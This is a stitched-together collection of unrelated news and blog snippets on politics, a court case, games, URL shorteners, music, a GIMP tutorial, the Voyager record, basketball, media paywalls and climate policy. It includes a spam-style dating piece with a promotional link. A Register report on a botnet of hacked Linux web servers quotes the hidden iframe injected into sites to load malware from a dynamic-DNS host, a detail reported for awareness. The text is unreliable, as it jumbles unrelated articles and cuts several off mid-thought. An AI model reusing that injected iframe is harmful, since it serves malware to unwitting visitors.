Note : Besides all of the other head - spinning revelations in these two paragraphs , note that the bus that burst into flames was being driven by an " undocumented migrant without a valid U.S. driver 's license . "
Hypocrisy much ?
I do n't even know where to start .
My mouth is just hanging open as I read through this report from Beyerstein .
What a marvelous job of pulling this together .
In an interview published on Firehouse.com , two of the survivors talked about first fleeing Hurricane Katrina , then fleeing Hurricane Rita , only then to survive their bus exploding .
An aide rescued Briant , who is 87 years old and confined to a wheelchair , by throwing her '' on her shoulder or something , '' quickly putting her down on the ground and going back for more patients .
'' I could n't move , and I said , ' Please God , do n't let my back be broken , ' '' Briant said .
'' I said , ' Get Claire ! ' ''
Her 84 - year - old sister Claire was still on the bus .
The sisters had already escaped one hurricane , evacuating from New Orleans to the Houston area ahead of Hurricane Katrina .
Less than a month later , Hurricane Rita forced an evacuation from their Brighton Gardens nursing home in Bellaire , Texas .
Read everything Beyerstein wrote , click on every link .
It just goes deeper and deeper , until your head explodes .
Beyerstein reports that Global Limo owner Jim Mapleswas convicted in 2006 after a federal court found him guilty of failing to maintain his four busses - which had 168 violations .
Just a month later , according to Beyerstein , BusBank was awarded a Homeland Security contract worth up to $ 55 million .
I can't find the actual source to Beyerstein 's report , using the search at
US Fed News .
I might be doing it wrong though .
But it appears as though Beyerstein has it right , as BusBank has a ' government ' section on its
website complete with Bald Eagle and American Flag .
While NASA , the Justice Department , FEMA and other important agencies had different event transportation requirements , they all agreed on the common solution ...
The BusBank® .
The BusBank website also says they only use safe , quality operators , so who knows what to believe .
We are always looking to discover quality operators who have good equipment and are committed to our standards , but we are not for everyone .
We want operators who are committed to safety and superior service delivery and who have the wherewithal to deliver on that commitment .
Operators who are open to a mutually beneficial business relationship , are willing to embrace technological innovation and are committed to a superior customer experience will get most of our business .
Our commitment is to provide new business and new service offerings that will help your business grow , in addition to special services and savings unavailable through other means .
In short , our commitment to help shape and ensure a brighter future for all of us .
Burnt Orange Report picked up on Beyerstein 's story and used that report to connect the dots in a quick synopsis of Beyerstein 's work .
Burnt Orange Report
Republicans are fanning the flames of fear and spreading lies for their Pro-Insurance - Company - Secession tour , in an effort to scare senior citizens into opposing Obama 's health care plan -- while hiring a bus company that was so irresponsible it led to the death of twenty - three senior citizens .
By now , the story is getting out .
The PAC which is funding the Tea Party Express , Our Country Deserves Better Committee is headed up by a guy named " The Honorable " Howard Kaloogian ( Republican - California , 1994 - 2000 ) .
( I 'm not completely sure why he has " The Honorable " in front of his name . )
Yea , Kaloogian ( feel free to pronounce it ' hooligan , ' I do n't mind ) is the same guy who apparently does n't know the difference between
Iraq and Turkey .
Yea , and Dick Armey is involved too , as his Freedom Works was a major sponsor of the 9/12 million moran march .
The PAC Our Country Deserves better was also a sponsor .
Beyerstein reports that BusBank and Global Limo settled a lawsuit stemming from the 2005 immolation of the 23 senior citizens for around $ 11 million , and filed for bankruptcy last month .
But apparently there is more to come with this story .
The court heard Leanne Richardson had been extremely drunk
An amorous couple have been fined for having sex in broad daylight - in a police station car park .
Leanne Richardson , 26 , and Ross Welsh , 30 , had to be physically stopped mid sex act by officers from Portobello police station in Edinburgh .
They both pleaded guilty to committing a breach of the peace in the car park on 21 April and were fined £ 200 .
Edinburgh Sheriff
Court heard they were both very drunk and had met in a pub just a few hours before .
The court heard officers at Portobello police station were stunned when a woman came to the front desk and told them there was a naked man in the car park behind their building .
As the officers left to investigate , an elderly man gesticulated towards the car park and arriving there the officers saw a man performing a sex act with a woman .
Fiscal Depute Dev Kapadia said : " As soon as the police realised what was happening they requested the two to stop , but it would appear Mr Welsh did not hear them and continued .
At this point police officers pulled him away from Miss Richardson . "
' Sought solace '
He added : " Miss Richardson , who had her eyes closed , suddenly realised the police officers were present and got up to her feet and pulled up her clothing . "
Mr Kapadia said the couple had both been drinking and were " blissfully unaware that their actions had been observed by passers - by " .
Appearing for Richardson , a mother of two , solicitor Nigel Bruce said at the time of the incident she had been suffering from depression and had " sought solace in alcohol " .
He said she had been extremely drunk .
Defence agent for Welsh , David Taylor , said the incident occurred three days after Welsh 's birthday .
He had been drinking heavily over the three days .
He had planned to go to the library to access some on - line material , but could not get it until 3 pm and had " unwisely gone for more drink " .
Mr Taylor said Welsh got into conversation with Richardson and in their drunken state they had gone and engaged in the disgraceful behaviour which had caused alarm to members of the public .
His client , he added , had no previous convictions and " was mortified , perhaps doubly so given the nature of the offence " .
Sheriff Fiona Reith fined the couple , but said they did not need to be entered on the sex offenders register .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Looking like a violent , sketch - filled high school notebook come to life , the PS4 exclusive game Drawn to Death will be free for PS Plus members when it launches next month on April 4 ( April 5 in Australia ) .
The announcement was made on the official PlayStation Blog by David Jaffe , game director at The Bartlet Jones Supernatural Detective Agency , who is best known as the creator of Sony 's equally violent God of War series .
" I wanted to find a way to invite all of you PS Plus members into this experience and give you a look at what really excites me about games these days , " said Jaffe before excitedly announcing the game 's release date and PS Plus status .
" We just could n’t wait any longer to share the good news , so here – finally – loud and proud and excited as - all - get - out , allow me to announce that on 4th April Drawn To Death launches and PS Plus members get it for free ! "
Jaffe describes the game as a " 3rd person hybrid shooter / brawler " as well as a " highly competitive , fast paced , online action game . "
Head over to the blog to read all about the game 's new features , but first , check out the game 's gnarly gameplay trailer below .
As Twitter and its 140 character limit has skyrocketed to popularity , another type of service rode grew exponentially as well : URL shorteners .
From Bit.ly to TinyURL , the quality and number of link shorteners has ballooned .
This rise has sparked a huge debate in the tech community .
Are URL shorteners good for the web ?
Delicious founder Joshua schachter made a strong case against them .
We provided a devil 's advocate argument in favor of URL shorteners .
The debate 's about to heat up again though , as Tr.im , a URL shortener with nearly a million unique visitors per month , is shutting down .
And by January 1st , 2010 , all Tr.im links could be out of service .
The URL shortener 's demise exposes a major flaw in all URL shorteners and reopens the debate over whether they are good or bad for the web .
Tr.im's Somber Message
If you visit Tr.im 's homepage , you will see a short , four paragraph statement announcing Tr.im has been discontinued , effective immediately .
Here 's the full text .
I have bolded the most interesting parts :
Statistics can no longer be considered reliable , or reliably available going forward .
However , all tr.im links will continue to redirect , and will do so until at least December 31 , 2009 .
Your tweets with tr.im URLs in them will not be affected .
We regret that it came to this , but all of our efforts to avoid it failed .
No business we approached wanted to purchase tr.im for even a minor amount .
There is no way for us to monetize URL shortening — users wo n't pay for it — and we just can't justify further devleopment since Twitter has all but annointed bit.ly the market winner .
There is simply no point for us to continue operating tr.im , and pay for its upkeep .
We apologize for the disruption and inconvenience this may cause you .
This is one of the most interesting shutdown announcements I 've ever read .
The key points are that links will work until the end of the year , that tr.im believes Bit.ly has won , and that they believe there is NO WAY to monetize URL shorteners .
It 's a very stark and powerful message .
But is Tr.im correct ?
What Does Tr.im 's Shutdown Mean for the Web ?
While Tr.im did n't have anywhere near the traffic that Bit.ly and TinyURL had , it still had a significant userbase , as you can find millions of Tr.im URLs spread across Twitter .
If Tr.im shuts down its servers , millions of links will simply die .
Poof , just like that .
Someone could even buy Tr.im and redirect all the links to spam , porn , or malware .
Our bet however is that someone reputable buys Tr.im before December 31st .
There is just too much value in those links for there to be no bidders .
Tr.im 's demise renews the debate over URL shorteners .
What happens if Bit.ly or TinyURL were to be hacked or lost their URL data ?
An entire ecosystem of links would suddenly be swept away .
Millions upon millions of links could suddenly vanish , leaving users confused and a possibly uncleanable mess .
It also opens up the debate on monetizing URL shorteners .
TinyURL has survived for years just fine , while Bit.ly 's preparing to launch a new product that will compete directly with Digg .
Will users pay for URL shorteners ?
No , probably not .
However , they might pay for the information that URL shorteners possess .
Tr.im 's shutdown is going to result in a mess unless it 's bought .
Its death reopens a very real and very important debate on the future of URL shorteners and the entire link - sharing ecosystem that Twitter has built .
Last year , the Supreme Court declared in a Washington , D.C. , case that the constitutional right to keep and bear arms belongs to individuals and not , as gun-control advocates had hoped , just to state militias .
Last week , the court agreed to decide whether that broad , and debatable , interpretation of the 2nd Amendment applies to states as well as the federal government .
At issue is a Chicago law imposing stringent restrictions on gun ownership , including a ban on the private ownership of handguns .
If you support measures to reduce gun violence , as this page does , it ’s tempting to hope that the court will rule that states are n’t bound by the 2nd Amendment .
The problem is that allowing states ( and cities ) to ignore this part of the Bill of Rights could undermine the requirement that they abide by others .
Landmark civil liberties decisions spanning eight decades were possible only because the justices concluded that key protections of the Bill of Rights applied to the states , because those rights were “ incorporated ” by the 14th Amendment .
Added to the Constitution after the Civil War , that amendment includes these words : “ No state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States ; nor shall any state deprive any person of life , liberty , or property , without due process of law ; nor deny to any person within its jurisdiction the equal protection of the laws . ”
That language does n’t explicitly refer to any portion of the Bill of Rights adopted in 1791 .
But the court has held that many of those rights , including freedom of the press and freedom from unreasonable searches -- along with “ unenumerated ” ones such as a right to abortion -- are protected by the 14th Amendment ’s due process clause forbidding states from abridging “ liberty ” without due process .
By contrast , the court has derived few rights from the clause referring to the “ privileges ” and “ immunities ” of citizenship .
Advertisement
In its decision last year , the court did n’t rule on whether the 2nd Amendment applied to the states as well as to the District of Columbia , a federal entity .
Lower courts have divided on the question .
( Justice Sonia Sotomayor was criticized after her nomination to the Supreme Court for joining an opinion that refused to apply the amendment to the states . )
In the Chicago case , the justices are considering whether the 2nd Amendment should be applied to the states by either the 14th Amendment ’s due process clause ( which applies to “ persons ” ) or its privileges and immunities clause ( which protects only citizens ) .
The court should say yes , even as it reaffirms its assurance in its 2008 decision that government may still impose reasonable restrictions on the right to bear arms .
This is no time for the court to start picking and choosing when it comes to the Bill of Rights .
Love is , apparently , what they ain't got .
Hours before the surviving members of Long Beach - bred surf - punk band Sublime are to reunite at the Cypress Hill Smokeout in Devore on Saturday , the estate of deceased singer Bradley Nowell has released a statement blasting the performance , and threatening legal action .
" Our hope is that Brad 's ex-bandmates will respect his wishes and find a new name to perform under , so as to enhance the ‘ Sublime ’ legacy without the confusion and disappointment that many fans have expressed upon seeing the announcement , " reads a statement distributed to the press , and signed by the surviving members of Brad 's family , his widow Troy , his son Jakob and his father Jim .
The Smokeout performance would be the first major live appearance under the Sublime name in more than a decade .
Original Sublime members Bud Gaugh and Eric Wilson are to perform with last - name - less vocalist / guitarist Rome .
In the years since Nowell died of a drug overdose in 1996 , Gaugh and Wilson formed the Long Beach Dub All - Stars , and Gaugh had recently formed a new band in Del Mar .
UPDATED AT 1:54 P.M. : Sublime surviving members Gaugh and Wilson issued a statement in response the estate Friday afternoon , declaring that there have already been unsuccessful legal attempts made to stop the band from performing .
It reads , " While we all mourn the passing of our brother and bandmate Bradley Nowell some thirteen years ago , Sublime still has a strong message of hope and love to share -- a message that is especially important in these difficult times ...
Brad 's heirs apparently do not share this vision and do not want the band Sublime to continue and tried -- unsuccessfully -- to file a temporary restraining order to prevent the band from carrying on .
Despite those objections , we are pleased that the United States District Court has allowed us to perform as Sublime for all of our fans . "
This is not the first sign that there was tension over the Sublime reunion .
Gaugh earlier wrote on his official website that there were behind - the - scenes attempts to " derail " the comeback show .
Gaugh singled out Silverback Management -- the firm that counts Sublime among on its roster -- as the company trying to put an end to the Sublime reunion , and posted Silverback execs ' e-mail addresses on the site .
Wrote Gaugh , " If it upsets you that a management firm , a suit & tie operation is attempting to destroy Bud and Eric 's reunion , maybe write them personally and ask them why they would want that .
Ask them to give a good excuse as why Brad 's music should n't have the chance to live on , why Jakob should n't have the opportunity to be set for life as his fathers legacy along with the rest of the band have rightfully secured this for him .
Send good ole Jon Phillips and Blaine Kaplan an email asking these important questions & demanding answers . "
In this video , the Valve boss Gabe Newell takes questions at the Park Hyatt Hotel in Sydney and discusses support for Left 4 Dead and why he honored the deal to fly to Australia to see a modder 's campaign
Newell was asked about support for Left 4 Dead and Left 4 Dead 2 , relative to other Valve titles , and the chief offered that " Team Fortress is the benchmark and that 's the level we intend to bring all products to .
We 're going through transition , which I think is interesting .
We call it " entertainment as a service " and Team Fortress is furthest along , in terms of rapid regular updates , and moving into movies with the ' Meet the Team ' shorts , as well as we 're starting to do some stuff with comics .
So , Team Fortress is really the model that the rest of our products are gonna be following as we move ahead .
Advertisement
As to why he honored modder Joe W - A's request to get down to Brisbane and see his Left 4 Dead campaign :
We recognize that we really are part of this community .
We talk about it a lot , that we 're not up here and the community 's down here , and the games snowflake in .
We really are part of it .
We look to that community to see what we should do .
...
It was pretty clear that this was one of those things that the community fell in love with the idea .
They wanted us to come down here and meet with Joe and give him feedback .
And in our experience , it 's been very bad idea when we get such a clear signal from pc gaming community , if we ignore it .
Advertisement
Fly Gabe Newell - Gabe Q&A - Part One [ YouTube , from Joe W-A ]
A Post By : Peter West Carey
Removing red eyes from photos with Gimp is a straight forward process .
It involves just five steps and allows for a fair amount of flexibility for the photographer .
Let ’s jump right in !
That ’s me .
Slightly out of focus as usual .
This shot was taken with a simple point and shoot in near darkness .
And with plenty of red to remove .
The trick is to not simply replace the red with another color or the result will be too fake .
1 ) Zoom , zoom , zoom way in ( hitting the “ + ” key ) until just the eyes fill the screen like so :
2) Click on the Ellipse Select Tool in the Toolbox .
Be sure to select “ Feather edges ” giving them a radius around 15 - 20 .
3 ) Now draw an ellipse around one eye that encompasses the redness to be removed .
Hold down “ Shift ” and draw an ellipse around the other eye .
The corners of the ellipses can be click and dragged to adjust sizes as needed .
4 ) From the Menu Bar select “ Filters -> Enhance -> Red Eye Removal ” .
A dialog box like this will appear .
5 ) Select the amount of removal to suit your desires and then click “ OK ”
Presto !
You ’re finished !
The tool works to varying degrees depending on the amount of redness but when a tight selection is made around the eyes , the results are very pleasing while not seeming too fake .
I chose a slightly blurry photo as they are the hardest from which to remove redeye .
A crisper picture will produce better results as there will be more contrast between the red and all other colors .
While there are many different ways to select the area for redeye removal , I chose the Ellipse over the Fuzzy Select Tool as I found the Fuzzy Select tool to be more cumbersome when the redeyes have multiple shades of red .
Some people also suggest selecting a larger space with the Rectangle Select Tool , however this did not work for me as my skin tone was too close to the redeye color and gave poor results .
Feel free to try another selection method and find what works best for you .
The following music was included on the Voyager record .
Bach , Brandenburg Concerto No. 2 in F. First Movement , Munich Bach Orchestra , Karl Richter , conductor .
4:40
Java , court gamelan , " Kinds of Flowers , " recorded by Robert Brown .
4:43
Senegal , percussion , recorded by Charles Duvelle .
2:08
Zaire , Pygmy girls ' initiation song , recorded by Colin Turnbull .
0:56
Australia , Aborigine songs , " Morning Star " and " Devil Bird , " recorded by Sandra LeBrun Holmes .
1:26
Mexico , " El Cascabel , " performed by Lorenzo Barcelata and the Mariachi México .
3:14
" Johnny B. Goode , " written and performed by Chuck Berry .
2:38
New Guinea , men 's house song , recorded by Robert MacLennan .
1:20
Japan , shakuhachi , " Tsuru No Sugomori " ( " Crane 's Nest , " ) performed by Goro Yamaguchi .
4:51
Bach , " Gavotte en rondeaux " from the Partita No. 3 in E major for Violin , performed by Arthur Grumiaux .
2:55
Mozart , The Magic Flute , Queen of the Night aria , no .
14 . Edda Moser , soprano .
Bavarian State Opera , Munich , Wolfgang Sawallisch , conductor .
2:55
Georgian S.S.R. , chorus , " Tchakrulo , " collected by Radio Moscow .
2:18
Peru , panpipes and drum , collected by Casa de la Cultura , Lima .
0:52
" Melancholy Blues , " performed by Louis Armstrong and his Hot Seven .
3:05
Azerbaijan S.S.R. , bagpipes , recorded by Radio Moscow .
2:30
Stravinsky , Rite of Spring , Sacrificial Dance , Columbia Symphony Orchestra , Igor Stravinsky , conductor .
4:35
Bach , The Well - Tempered Clavier , Book 2 , Prelude and Fugue in C , No.1. Glenn Gould , piano .
4:48
Beethoven , Fifth Symphony , First Movement , the Philharmonia Orchestra , Otto Klemperer , conductor .
7:20
Bulgaria , " Izlel je Delyo Hagdutin , " sung by Valya Balkanska .
4:59
Navajo Indians , Night Chant , recorded by Willard Rhodes .
0:57
Holborne , Paueans , Galliards , Almains and Other Short Aeirs , " The Fairie Round , " performed by David Munrow and the Early Music Consort of London .
1:17
Solomon Islands , panpipes , collected by the Solomon Islands Broadcasting Service .
1:12
Peru , wedding song , recorded by John Cohen .
0:38
China , ch'in , " Flowing Streams , " performed by Kuan P'ing - hu .
7:37
India , raga , " Jaat Kahan Ho , " sung by Surshri Kesar Bai Kerkar .
3:30
" Dark Was the Night , " written and performed by Blind Willie Johnson .
3:15
Beethoven , String Quartet No. 13 in B flat , Opus 130 , Cavatina , performed by Budapest String Quartet .
6:37
By Chris Sheridan
Israeli and Euroleague coaching legend Pini Gershon butted heads Sunday with the NBA ’s new replacement referees , and it took a rabbi , several security guards and a whole lot of time to get the situation defused .
In one of the more bizarre moments of this NBA preseason , the head coach of Maccabi Tel Aviv stubbornly refused to leave the court for 10 minutes after he was ejected in the third quarter of his team ’s 106-91 exhibition loss to the New York Knicks .
" Never seen anything like that before , and I ’ve been doing this an awful long time , " a senior Madison Square Garden security official said in the aftermath of the ejection of Gershon , the 57 - year - old coach who led Maccabi to the Euroleague championship twice earlier this decade before leaving to coach Olympiacos , then returning to Maccabi .
A slew of calls had been going against Maccabi when New York ’s Al Harrington was whistled for an offensive foul with 5:05 remaining in the third quarter , right in front of the Maccabi bench , for pushing off with his elbow .
Perhaps not realizing the call was being made in favor of his team , Gershon jumped in the face and started screaming at replacement referee Ben Taylor , who immediately whistled Gershon for his second technical foul and gave him the heave - ho signal .
But Gershon immediately made it clear that he was not leaving , standing upright in front of his bench and shaking his head ‘ no ’ -- even after security officials from the NBA and Madison Square Garden tried to coax him off the floor ( without any assistance , it should be noted , from the Maccabi hierarchy ) .
As Taylor stayed away , referees Victor Montgomery and Williams Mensah also tried unsuccessfully to convince Gershon to leave , and an elderly rabbi from an Israeli charity that sponsored the game came onto the court and pleaded with the NBA referees to reverse their call .
" He ’s not leaving , " said Maccabi forward Yaniv Green , a former Pistons summer league player who was clearly amused by the turn of events .
Gershon , who never grew belligerent , finally left under a security escort .
It was unclear if NBA officials had threatened Maccabi with having to forfeit , which would have been one of the referees ’ few avenues of recourse had Gershon not relented .
" I do n’t want to talk .
I am still too mad about this game .
Maybe next time , " Gershon said as he boarded a freight elevator some 45 minutes after the game .
If Gershon was under the jurisdiction of the NBA , he would be facing an astronomical fine and suspension for his actions .
Instead , he is expected back on the sidelines -- and likely under the close watch of another crew of replacement referees -- on Tuesday night in Los Angeles for Maccabi ’s exhibition game against the Clippers .
" For sure Coach Gershon is a character .
You know he ’s energetic , he likes the crowd and the crowd likes him very much .
In Israel , they come to the game to see him even more than they come to see us .
So this was quite in - character , " Green said .
" It ’s a scrimmage game , a friendship game , and I think it ’s better if those kind of things do n’t happen , but it happened . "
On a more positive note , Larry Hughes of the Knicks hit a jump shot with 8:30 remaining to snap his 0 - for - 18 slump to start the preseason .
Hughes finished 1 - for - 3 , upping his accuracy rate to 5 percent in New York ’s five exhibition games .
But more than being about cost , his strategy is about pain .
What he is always doing is demonstrating a level of strength and will and resolve against which the other guys , the weaker guys , cower .
He can take more pain than anybody else .
While others persist in the vanity of the Internet , he will endure the short - or medium - term pain necessary to build a profitable business .
He is also a scold who can intimidate the market into doing what he wants it to do .
Part of his premise now is to invite and scare other publishers and content creators into a self - created monopoly .
If everybody charges , consumers will have no choice but to pay .
If all publishers have the opportunity to get paid , why would n’t they take the money ?
In the Murdoch view , media only really works as a good business if it achieves significant control of the market — through pricing , through exclusive sports arrangements , through controlling distribution ( he has spent 20 years trying to monopolize satellite distribution around the world ) .
And , indeed , by announcing his all - paid - content intentions , he has , almost single - handedly , not just made the paid model the main topic of digital strategy in other traditional publishing companies but imbued it with nearly the force of a fait accompli .
“ It ’s a done deal , ” says a journalist I know who ’s suffered in the downturn , arguing that Murdoch , for so long journalism ’s great debaser , is now its last protector .
The Murdoch plan is , however , in the estimation of almost anybody whose full - time job is occupied with digital business strategies , not just cockamamy but head - scratching .
It seems that Murdoch has , in a fit of pique , made certain pronouncements which may have to be humored by the people who work for him , but which will be impossible to implement and will have no business consequences .
Or that Murdoch , a man with something of a divine gift for acting in his own self - interest , has a plan not yet quite evident to other , mere media mortals .
The position of Internet professionals is straightforward : while it ’s possible to charge for certain kinds of specialized information — specifically , information that helps you make money ( and that you can , as with an online Wall Street Journal subscription , buy on your company expense account ) — there are no significant examples of anyone being able to charge for general - interest information .
Sites where pay walls have been erected have suffered cuts in user traffic of , in many cases , as much as 95 percent as audiences merely move on to other , free options .
“ What Murdoch seems to be talking about only has a logic if you do n’t introduce the behavior of the audience into the equation , ” says Emily Bell .
There is , alternatively , the compounding and intoxicating effect of free .
While there may not yet be a way to adequately monetize free traffic , it has opened up , for many publications , great new audiences .
The million - circulation New York Times has an audience of more than 15 million online .
The U.K. paper
The Guardian , with its 350,000 circulation , has become , online , with 10 times its print readership , a significant international brand .
One theory about the decline in the fortunes of The Wall Street Journal ( which allowed Murdoch to buy it ) is that , because of its paid wall , the Journal was not a factor in Google searches , causing a fundamental decline in its importance , impacting its brand and standing with advertisers .
Murdoch believes that The Sunday Times has certain franchises so valuable that he will surely be able to capture a paying audience .
Jeremy Clarkson is one of News Corp .’s strongest cases .
Clarkson , who writes a column about cars , is a veritable British institution — everybody consults Clarkson before buying a car .
He is , according to in - house estimates at the Times , now responsible for 25 percent of timesonline .
co.uk traffic .
The thinking is that , even if a pay wall cuts Clarkson ’s traffic , there are enough fanatical Clarkson readers who will pay enough to make a paid Clarkson more valuable than a free , ad - supported one .
But the problem is for Clarkson : Murdoch ’s potential gain is Clarkson ’s loss .
It ’s an almost intolerable loss — most of your readers ( and their constant and addictive feedback ) .
“ When we opened the Times site to free international traffic , ” says Peter Bale , “ suddenly our columnists were getting speaking engagements in Milwaukee . ”
At The New York Times , it was the op - ed columnists themselves who objected most of all when a paid wall choked their readership and notoriety .
At an event I was at ; lately , an attractive , high - powered 31 - year old , using a Prada match and also a set of killer heels , revealed her frustration that cellphone magnate Charles Dunstone , worth a stonking ₤ 93 million , had obtained involved and was ‘ off the market . ’ he had also been learning a great deal about women by thegirlfriendactivationsystem.com .
In six months , she grumbled , she ‘d been asked out by only three males– her home builder , plumbing technician and also car auto mechanic .
‘ You call that trouble ?!’
I shrilled , reaching for a scrap of paper to make a note of their numbers – not for me , but also for my man-starved sweethearts to whom a spanner - wielding , super - handy man would undoubtedly be manna from heaven .
It ’s outrageous that females are still judging males on the dimension of their bank accounts .
Even if a man is high up on the rich listing , he is viewed as eligible .
What about individuality , a feeling of humor and also great appearances along with vital skills – like coming in handy with a drill ?
Surely there could be nothing more beautiful than dating a building contractor , plumber , or cars and truck mechanic– preferably all at once so you can get your residence , pipes , and vehicle needs taken care of for free .
I talk from experience .
I ’ve ended up being engaged to a builder after three remarkable years throughout which taps have been taken care of , ranges mounted , and also peeling off wallpaper changed .
I am the kind of girl who attracts over - flowing drains , ruptured pipes , and also collapsing ceilings , as well as going to the grace of arbitrary house calamities was continuous stress and anxiety until the introduction of Al and even his magic toolbox .
Having been informed at private schools , adhered to by college , I arose into real life at 18 without an idea how to wire a plug , change a car and truck tire or set up a rack .
Throughout the years , this suggests I , as well as many other middle - class saps , have gone to the grace of tradespeople that make a mint by using our absence of life skills .
So I saved no time at all in telling Ms. Prada suit that dating a builder is an unmitigated pleasure .
I confided there is nothing much more eye - catching than a man wielding a drill and ironing out one ’s long list of home trouble spots .
Could a cellphone mogul or banker mount solar panels , develop a loft space expansion as well as lay a bird - friendly moss roof on the top , which my chap remains in the process of doing ?
I do n’t think so .
Recent research studies have kept in mind how the economic environment affects our sights on what is eye - catching , and also tycoons are shedding their luster .
Now the country ’s state of mind has become thriftier ; we ’re fast disliking extravagant displays of riches .
If you no more require the embellishments that a high - earning City slicker will provide , why would you bother with the tension of organizing …
Padres turn to Paddack against Cardinals in Game 1
When the San Diego Padres move into their first postseason game in 14 years Wednesday , not only will they face their playoff nemesis the St. Louis Cardinals , they 'll do it with a pitching staff very much in flux .
A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to distribute malware to unwitting people browsing the web .
Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website , Denis Sinegubko , an independent researcher based in Magnitogorsk , Russia , told The Register .
But in addition to running an Apache webserver to dish up benign content , they 've also been hacked to run a second webserver known as nginx , which serves malware .
" What we see here is a long awaited botnet of zombie web servers !
A group of interconnected infected web servers with [ a ] common control center involved in malware distribution , " Sinegubko wrote here .
" To make things more complex , this botnet of web servers is connected with the botnet of infected home computer ( s ) . "
The finding highlights the continuing evolution of bot herders as they look for new ways to issue commands to the hundreds of thousands of infected zombies under their control .
It came the same day anti-virus provider Symantec reported Google Groups was being used as a master control channel for a recently discovered trojan .
Four weeks ago , a researcher from Arbor Networks made a similar discovery when he found several Twitter profiles being used to run a botnet .
The infected machines observed by Sinegubko serve legitimate traffic on port 80 , the standard TCP port used by websites .
Behind the scenes , the rogue server sends malicious traffic over port 8080 .
The malicious payloads are then delivered with the help of dynamic DNS hosting providers , which offer free domain names that are mapped to the IP address of the zombie webserver .
The links look something like this :
< i_frame src=" http ://a86x .
homeunix .
org:8080/ts/in.cgi?open2 " width=997 height=0 style= " visibility : hidden " ></ iframe >
They are injected into legitimate websites , so that they are surreptitiously served when users browse the infected page .
" It 's better to have both zombie clients and servers at the same time , Sinegubko wrote in an instant message .
" The heterogeneous system provides much more possibilities [ and ] makes the whole system more flexible . "
It 's unclear exactly how the servers have become infected .
Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed .
Indeed , the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers .
It 's likely the zombie servers were compromised in the same fashion , he explained .
With about 100 nodes , the network is relatively small , making it unclear exactly what the attackers ' intentions are .
All of the boxes examined so far have run the Apache webserver on a various distribution of Linux , he said .
" Probably it 's some sort of proof - of - concept thing for hackers , " he wrote .
" Or maybe they have many more other compromised servers waiting for their turn . "
So far , Sinegubko said , DynDNS.com and No-IP.com , the two dynamic hosting providers used by the attackers , have been commendably responsive in shutting down domains used in the attack .
But he went on to say he is detecting about two new IP addresses every hour , an indication that this may not be the last we 've heard of the phenomenon . ®
Indonesia born photographer and illustrator Agan Harahap uses his Photoshop skills to insert pictures of some of our beloved superheroes like Spiderman , Superman and Batman into memorable political and wartime photos from the mid-20th century in his new project called “ Superhero Photography ” .
Funny stuff .
[ via Formatmag ]
He said : " It is true that the correct title for this dish is Spotted Dick .
However , because of several immature comments from a few customers , catering staff renamed the dish Spotted Richard - or sometimes even Sultana Sponge .
Only a few hours left to Double your gift
On Friday afternoon , President Barack Obama formally announced that the world ’s 20 major developed and developing nations had agreed to gradually eliminate fossil - fuel subsidies .
It was the only climate - specific policy directive to come out of the Group of 20 ( G20 ) Summit in Pittsburgh , and it fell far short in the view of climate activists , who were hoping for a firm proposal on “ climate finance ” — G20 aid to poor nations for help in adapting to and mitigating climate change .
“ Removing fossil - fuel subsidies could be an important step towards cutting CO2 emissions , ” said Oxfam climate advisor David Waskow in a statement .
“ But it should not be allowed to distract from the failure of rich countries to offer poor countries the help they need .
Poor people should not be asked to pay the price of cutting emissions ” that rich countries have created .
Greenpeace climate finance advisor Steve Herz agreed .
“ We think it ’s an important step forward , ” said Herz , “ but it ’s no substitute for the work we expected them to be doing here , which was putting together a fair and ambitious financing package to help the world ’s poorest nations . ”
Despite the disappointment of activists , the commitment on the part of G20 leaders to cut fossil - fuel subsidies is an important step , assuming they follow through on their pledge .
Fossil - fuel subsidies add up to around $ 300 billion across the G20 major world economies .
Developing nations tend to use these subsidies to artificially lower fuel prices for consumers , while developed nations like the United States use them in the form of economic and tax sweeteners for fossil - fuel producers .
According to estimates from the International Energy Agency and the Organization for Economic Cooperation and Development , eliminating the subsidies would reduce global greenhouse - gas pollution 10 to 12 percent by 2050 .
“ We already know that the prices [ for fossil fuels ] are too low because they do n’t reflect the cost of climate change … the true scarcity value and opportunity cost of using this resource , ” said Columbia University ’s Scott Barrett , who studies natural resource economics .
“ These subsidies are sending the wrong signal about value and scarcity of fossil fuels in the marketplace . ”
Fossil - fuel subsides are also a drag on the ecomony .
“ If you ’re selling kerosene at a lower price than the world price … it will come out of the public purse in some other way , ” said Barrett , who co-authored a survey of economic policy strategies for combating climate change — including the elimination of fossil - fuel subsidies — for the Intergovernmental Panel on Climate Change ’s Second Assessment report , published in 1995 [ PDF ] .
Removing artificial price supports will help cool demand for dirty fuels while simultaneously making cleaner energy more competitive .
But it has to be done with care .
if subsidies are cut off thoughtlessly , warned Barrett , a head of state could end up with riots in the streets .
This is one reason fossil - fuel subsidies have not played a bigger role in climate negotiations .
Another , according to Barrett , is that many climate negotiators “ were pushing for targets and timelines , ” to the exclusion of all other options .
“ The biggest problem with targets and timetables is that they ’re not being met , they do n’t work , ” said Barrett .
“ So why not supplement discussions about targets and timetables with discussions about actions that are actually going to be taken ” — like retiring fossil fuel subsidies , which looks like it may actually happen .
At the end of the Pittsburgh Summit , G20 heads of state directed their finance czars to begin developing a more detailed phaseout plan at a November meeting in Scotland .
The G20 will revisit the issue at its next meeting , in Toronto in June 2010 .
BUENOS AIRES — Drought could parch close to 70 percent of the planet ’s soil by 2025 unless countries implement policies to slow desertification , a senior United Nations official has warned .
“ If we cannot find a solution to this problem … in 2025 , close to 70 percent could be affected , ” Luc Gnacadja , executive secretary of the United Nations Convention to Combat Desertification , said Friday .
ADVERTISEMENT
Drought currently affects at least 41 percent of the planet and environmental degradation has caused it to spike by 15 to 25 percent since 1990 , according to a global climate report .
“ There will not be global security without food security ” in dry regions , Gnacadja said at the start of the ninth UN conference on the convention in the Argentine capital .
“ A green deal is necessary ” for developing countries working to combat drought , he stressed .
The next meeting on the convention is scheduled to take place in South Korea in 2010 .
For the record :
Social Security was established in 1935 – they ’ve had 74 years to get it right ; it is broke .
Fannie Mae was established in 1938 – they ’ve had 71 years to get it right ; it is broke .
Freddie Mac was established in 1970 – they ’ve had 39 years to get it right ; it is broke .
